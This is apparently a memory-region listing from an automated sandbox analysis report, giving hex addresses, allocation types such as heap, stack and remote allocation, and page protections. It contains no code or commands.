3C94000
trusted library allocation
page read and write
4C0000
heap
page read and write
21E4A000
stack
page read and write
21760000
trusted library allocation
page read and write
2C5B000
trusted library allocation
page read and write
83000
trusted library allocation
page execute and read and write
360E000
trusted library allocation
page read and write
534000
heap
page read and write
677D000
stack
page read and write
2260000
trusted library allocation
page read and write
3760000
heap
page read and write
65F2000
heap
page read and write
215B0000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
54F000
heap
page read and write
4D2D000
heap
page read and write
56B000
heap
page read and write
4AAC000
heap
page read and write
360E000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
374F000
heap
page read and write
663F000
heap
page read and write
7FE89893000
trusted library allocation
page read and write
4ABA000
heap
page read and write
18F000
heap
page read and write
2979000
trusted library allocation
page read and write
7FE89884000
trusted library allocation
page read and write
4AB7000
heap
page read and write
245A000
trusted library allocation
page read and write
1FFF000
stack
page read and write
38C9000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
1A000000
heap
page read and write
360E000
trusted library allocation
page read and write
7FE89A37000
trusted library allocation
page read and write
3440000
direct allocation
page read and write
2A0000
heap
page read and write
21710000
trusted library allocation
page read and write
7FE8993C000
trusted library allocation
page execute and read and write
170000
heap
page read and write
444000
heap
page read and write
20000
heap
page read and write
360E000
trusted library allocation
page read and write
24900000
heap
page read and write
21650000
trusted library allocation
page read and write
1C0E0000
heap
page read and write
5424000
remote allocation
page execute and read and write
1B04F000
stack
page read and write
2C5B000
trusted library allocation
page read and write
314000
heap
page read and write
3773000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
550000
heap
page read and write
3753000
heap
page read and write
4D35000
heap
page read and write
67C8000
heap
page read and write
7FE89A62000
trusted library allocation
page read and write
4AAE000
heap
page read and write
5FA7000
heap
page read and write
215B0000
trusted library allocation
page read and write
38D5000
trusted library allocation
page read and write
12010000
trusted library allocation
page read and write
2975000
trusted library allocation
page read and write
160000
direct allocation
page read and write
7FE8989B000
trusted library allocation
page read and write
1D0000
direct allocation
page read and write
360E000
trusted library allocation
page read and write
178000
heap
page read and write
2D7C000
stack
page read and write
285000
trusted library allocation
page execute and read and write
5ED0000
direct allocation
page read and write
215B0000
trusted library allocation
page read and write
89000
heap
page read and write
3624000
remote allocation
page execute and read and write
38D0000
trusted library allocation
page read and write
65A0000
direct allocation
page read and write
3467000
direct allocation
page read and write
215B2000
trusted library allocation
page read and write
1C10000
trusted library allocation
page read and write
371E000
heap
page read and write
18F000
heap
page read and write
46D0000
heap
page read and write
60B0000
heap
page read and write
389000
heap
page read and write
22114000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
1C5E4000
heap
page read and write
21710000
trusted library allocation
page read and write
246F000
stack
page read and write
1C0000
heap
page read and write
1CFF000
direct allocation
page read and write
2ABD000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
4CD6000
heap
page read and write
21650000
trusted library allocation
page read and write
1C0000
heap
page read and write
21710000
trusted library allocation
page read and write
39D000
heap
page read and write
54F000
heap
page read and write
1A8E9000
stack
page read and write
3760000
heap
page read and write
3FE0000
heap
page read and write
494C000
heap
page read and write
38D0000
trusted library allocation
page read and write
22F4000
heap
page read and write
1C5E0000
heap
page read and write
273000
stack
page read and write
380000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
4D3D000
heap
page read and write
215B0000
trusted library allocation
page read and write
217B0000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
7EF20000
trusted library allocation
page execute and read and write
23089000
trusted library allocation
page read and write
2982000
trusted library allocation
page read and write
1A9CF000
stack
page read and write
21710000
trusted library allocation
page read and write
260000
trusted library allocation
page read and write
22061000
trusted library allocation
page read and write
22F8000
heap
page read and write
3753000
heap
page read and write
4D3A000
heap
page read and write
24108000
heap
page read and write
10000
heap
page read and write
3CE9000
heap
page read and write
1BF25000
heap
page read and write
362E000
trusted library allocation
page read and write
BF000
heap
page read and write
215B0000
trusted library allocation
page read and write
2260000
trusted library allocation
page read and write
4B24000
heap
page read and write
21700000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
2960000
remote allocation
page read and write
7FE89897000
trusted library allocation
page read and write
2660000
trusted library allocation
page execute read
4D3D000
heap
page read and write
32D4000
heap
page read and write
215B0000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
4AB9000
heap
page read and write
2D9000
heap
page read and write
194000
heap
page read and write
40A000
unkown
page write copy
2C5000
stack
page read and write
1C1000
heap
page read and write
21650000
trusted library allocation
page read and write
248FD000
stack
page read and write
21650000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
317000
heap
page read and write
360E000
trusted library allocation
page read and write
2ABA000
trusted library allocation
page read and write
74000
heap
page read and write
36F3000
heap
page read and write
1E70000
heap
page read and write
215B3000
trusted library allocation
page read and write
560000
heap
page read and write
147000
heap
page read and write
7FE89930000
trusted library allocation
page read and write
4ABA000
heap
page read and write
1B6000
heap
page read and write
28C000
stack
page read and write
1A57F000
stack
page read and write
37B7000
heap
page read and write
4AB7000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
2058000
trusted library allocation
page read and write
430000
unkown
page read and write
215B0000
trusted library allocation
page read and write
2AB1000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
38C9000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
7FE89940000
trusted library allocation
page execute and read and write
217FE000
stack
page read and write
1A19E000
stack
page read and write
1C12C000
heap
page read and write
4A6A000
heap
page read and write
4D3D000
heap
page read and write
21650000
trusted library allocation
page read and write
494E000
heap
page read and write
36F3000
heap
page read and write
4D3D000
heap
page read and write
215B0000
trusted library allocation
page read and write
1C17E000
heap
page read and write
21CAE000
stack
page read and write
4AAE000
heap
page read and write
21700000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
659F000
unkown
page read and write
1AF99000
heap
page read and write
2982000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
217B0000
trusted library allocation
page read and write
2175D000
stack
page read and write
4D2D000
heap
page read and write
395000
heap
page read and write
4FE000
heap
page read and write
554000
heap
page read and write
215B0000
trusted library allocation
page read and write
241A1000
heap
page read and write
362E000
trusted library allocation
page read and write
4ABC000
heap
page read and write
244FD000
stack
page read and write
22F0000
heap
page read and write
4B07000
heap
page read and write
297D000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
38C9000
trusted library allocation
page read and write
36D7000
heap
page read and write
2ABD000
trusted library allocation
page read and write
21B2E000
stack
page read and write
596000
heap
page read and write
194000
heap
page read and write
1D50000
heap
page execute and read and write
375B000
heap
page read and write
21600000
heap
page read and write
6510000
remote allocation
page read and write
4B22000
heap
page read and write
1A7F8000
stack
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
1B6000
heap
page read and write
4A01000
heap
page read and write
1B0000
direct allocation
page read and write
215B0000
trusted library allocation
page read and write
2AA8000
trusted library allocation
page read and write
21A8C000
stack
page read and write
2ABD000
trusted library allocation
page read and write
446000
heap
page read and write
215B0000
trusted library allocation
page read and write
4CF5000
heap
page read and write
180000
direct allocation
page read and write
56B000
heap
page read and write
1AC0000
heap
page read and write
2AB4000
trusted library allocation
page read and write
2973000
trusted library allocation
page read and write
374D000
heap
page read and write
373B000
heap
page read and write
2C5B000
trusted library allocation
page read and write
4D35000
heap
page read and write
4024000
remote allocation
page execute and read and write
215B0000
trusted library allocation
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
67BE000
stack
page read and write
3760000
heap
page read and write
1A908000
heap
page execute and read and write
1CE000
heap
page read and write
4B1A000
heap
page read and write
4D1F000
heap
page read and write
4D21000
heap
page read and write
3730000
heap
page read and write
3546000
trusted library allocation
page read and write
1BF5B000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
1C40000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
1C6000
heap
page read and write
21650000
trusted library allocation
page read and write
10000
heap
page read and write
215B0000
trusted library allocation
page read and write
2001000
trusted library allocation
page read and write
4A03000
heap
page read and write
194000
heap
page read and write
37BB000
heap
page read and write
282000
trusted library allocation
page read and write
3753000
heap
page read and write
3500000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
313000
heap
page read and write
65D4000
heap
page read and write
16D000
heap
page read and write
21800000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
1B6000
heap
page read and write
4C7000
heap
page read and write
38C9000
trusted library allocation
page read and write
6115000
heap
page read and write
1C9CF000
stack
page read and write
7FE89BC0000
trusted library allocation
page read and write
322A000
stack
page read and write
4A03000
heap
page read and write
21DDE000
stack
page read and write
3753000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
11C000
heap
page read and write
2C5B000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
2AAE000
trusted library allocation
page read and write
297E000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
1EA6000
heap
page read and write
2C5B000
trusted library allocation
page read and write
1C13D000
heap
page read and write
36CF000
heap
page read and write
21650000
trusted library allocation
page read and write
216E0000
trusted library allocation
page read and write
10000
heap
page read and write
4CC0000
heap
page read and write
38D0000
trusted library allocation
page read and write
2C5B000
trusted library allocation
page read and write
2DF000
heap
page read and write
2B6000
heap
page read and write
562000
heap
page read and write
7FE000
stack
page read and write
21870000
trusted library allocation
page read and write
4AB9000
heap
page read and write
14D000
heap
page read and write
37D000
heap
page read and write
1CC0000
heap
page execute and read and write
21B8E000
stack
page read and write
52A000
heap
page read and write
4D37000
heap
page read and write
23061000
trusted library allocation
page read and write
1AE76000
heap
page read and write
1CE7000
direct allocation
page read and write
2982000
trusted library allocation
page read and write
1B1CC000
stack
page read and write
3420000
direct allocation
page read and write
220F8000
trusted library allocation
page read and write
3580000
trusted library allocation
page read and write
2C5B000
trusted library allocation
page read and write
38C9000
trusted library allocation
page read and write
408000
unkown
page readonly
38D0000
trusted library allocation
page read and write
106000
heap
page read and write
136000
heap
page read and write
218BE000
stack
page read and write
22117000
trusted library allocation
page read and write
147000
heap
page read and write
3753000
heap
page read and write
86E000
stack
page read and write
194000
heap
page read and write
245E000
trusted library allocation
page read and write
5E24000
remote allocation
page execute and read and write
24068000
trusted library allocation
page read and write
7FE8988D000
trusted library allocation
page execute and read and write
21650000
trusted library allocation
page read and write
4A03000
heap
page read and write
215FE000
stack
page read and write
362E000
trusted library allocation
page read and write
438F000
stack
page read and write
1E80000
heap
page read and write
360E000
trusted library allocation
page read and write
1D00000
direct allocation
page read and write
194000
heap
page read and write
4D2D000
heap
page read and write
4D37000
heap
page read and write
297B000
trusted library allocation
page read and write
2AA8000
trusted library allocation
page read and write
38D5000
trusted library allocation
page read and write
36D6000
heap
page read and write
371C000
heap
page read and write
21650000
trusted library allocation
page read and write
4D35000
heap
page read and write
39D8000
trusted library allocation
page read and write
14E000
heap
page read and write
4B22000
heap
page read and write
244AD000
stack
page read and write
2C60000
trusted library allocation
page execute
215B3000
trusted library allocation
page read and write
1CE000
heap
page read and write
8B0000
heap
page read and write
4D21000
heap
page read and write
1C0000
direct allocation
page read and write
54F000
heap
page read and write
219AE000
stack
page read and write
1A93E000
heap
page execute and read and write
1A900000
heap
page execute and read and write
39E000
heap
page read and write
21C1E000
stack
page read and write
362E000
trusted library allocation
page read and write
2AA8000
trusted library allocation
page read and write
4AB9000
heap
page read and write
21F4F000
stack
page read and write
10000
heap
page read and write
60F0000
heap
page read and write
609E000
unkown
page read and write
371C000
heap
page read and write
360E000
trusted library allocation
page read and write
4CF7000
heap
page read and write
1AE40000
heap
page read and write
22020000
heap
page read and write
362E000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
4B22000
heap
page read and write
218C0000
trusted library allocation
page read and write
3473000
direct allocation
page read and write
373B000
heap
page read and write
38D5000
trusted library allocation
page read and write
2ABD000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
3C60000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
7FE89A3C000
trusted library allocation
page read and write
494C000
heap
page read and write
4B12000
heap
page read and write
374F000
heap
page read and write
8D5000
heap
page read and write
2977000
trusted library allocation
page read and write
2AA5000
trusted library allocation
page read and write
3749000
heap
page read and write
375C000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
2410B000
heap
page read and write
3760000
heap
page read and write
215B0000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
1F70000
direct allocation
page read and write
4CF5000
heap
page read and write
216E1000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
2AB5000
trusted library allocation
page read and write
372000
heap
page read and write
141000
heap
page read and write
4B09000
heap
page read and write
1C112000
heap
page read and write
14C000
heap
page read and write
2977000
trusted library allocation
page read and write
10000
heap
page read and write
4AAE000
heap
page read and write
297B000
trusted library allocation
page read and write
1A580000
heap
page read and write
4B22000
heap
page read and write
7FE89A20000
trusted library allocation
page read and write
4D1F000
heap
page read and write
220C8000
trusted library allocation
page read and write
1CE000
heap
page read and write
360E000
trusted library allocation
page read and write
4CDB000
heap
page read and write
310000
heap
page read and write
4D21000
heap
page read and write
2C5B000
trusted library allocation
page read and write
12031000
trusted library allocation
page read and write
3769000
heap
page read and write
2DE000
heap
page read and write
287C000
trusted library allocation
page read and write
7FE89A88000
trusted library allocation
page read and write
38BB000
stack
page read and write
38D5000
trusted library allocation
page read and write
2C5B000
trusted library allocation
page read and write
1F90000
direct allocation
page read and write
1C1000
heap
page read and write
65B0000
direct allocation
page read and write
3760000
heap
page read and write
1DF0000
heap
page read and write
297B000
trusted library allocation
page read and write
2ABD000
trusted library allocation
page read and write
4D35000
heap
page read and write
7FE89882000
trusted library allocation
page read and write
217A8000
stack
page read and write
4ABA000
heap
page read and write
371C000
heap
page read and write
3230000
trusted library allocation
page read and write
435000
unkown
page read and write
4AAC000
heap
page read and write
80000
heap
page read and write
70000
heap
page read and write
21650000
trusted library allocation
page read and write
7FE89A84000
trusted library allocation
page read and write
26D000
trusted library allocation
page execute and read and write
7FE89B90000
trusted library allocation
page read and write
2AB0000
trusted library allocation
page read and write
21810000
trusted library allocation
page read and write
586000
heap
page read and write
20000
heap
page read and write
297B000
trusted library allocation
page read and write
5FDD000
heap
page read and write
350000
heap
page read and write
67C0000
heap
page read and write
1B6000
heap
page read and write
14E000
heap
page read and write
4B10000
heap
page read and write
4D37000
heap
page read and write
27B0000
heap
page read and write
215B0000
trusted library allocation
page read and write
4A03000
heap
page read and write
38C9000
trusted library allocation
page read and write
562000
heap
page read and write
4D2D000
heap
page read and write
4D39000
heap
page read and write
362E000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
374A000
heap
page read and write
215B0000
trusted library allocation
page read and write
1A770000
heap
page read and write
2979000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
11E000
heap
page read and write
4CDD000
heap
page read and write
398000
heap
page read and write
21E80000
heap
page read and write
4B07000
heap
page read and write
562000
heap
page read and write
2982000
trusted library allocation
page read and write
2982000
trusted library allocation
page read and write
37BB000
heap
page read and write
216F0000
trusted library allocation
page read and write
49AD000
heap
page read and write
2ABA000
trusted library allocation
page read and write
21710000
trusted library allocation
page read and write
37B7000
heap
page read and write
8B7000
heap
page read and write
250000
direct allocation
page read and write
38C9000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
33C0000
direct allocation
page read and write
90C000
heap
page read and write
12A000
heap
page read and write
30D000
heap
page read and write
373C000
heap
page read and write
1CFB000
direct allocation
page read and write
4CF7000
heap
page read and write
2437E000
stack
page read and write
190000
heap
page read and write
4D2D000
heap
page read and write
2984000
trusted library allocation
page read and write
22FB000
heap
page read and write
4D3D000
heap
page read and write
2C40000
trusted library allocation
page read and write
4D1F000
heap
page read and write
38C9000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
662D000
heap
page read and write
1AF94000
heap
page read and write
215B0000
trusted library allocation
page read and write
56B000
heap
page read and write
372F000
heap
page read and write
215B0000
trusted library allocation
page read and write
1C10D000
heap
page read and write
362E000
trusted library allocation
page read and write
408000
unkown
page readonly
360E000
trusted library allocation
page read and write
F1000
heap
page read and write
362E000
trusted library allocation
page read and write
230000
direct allocation
page read and write
1B6000
heap
page read and write
2983000
trusted library allocation
page read and write
2540000
trusted library allocation
page read and write
6610000
heap
page read and write
144000
heap
page read and write
2A8000
heap
page read and write
1BF20000
heap
page read and write
There are 964 hidden memdumps, click here to show them.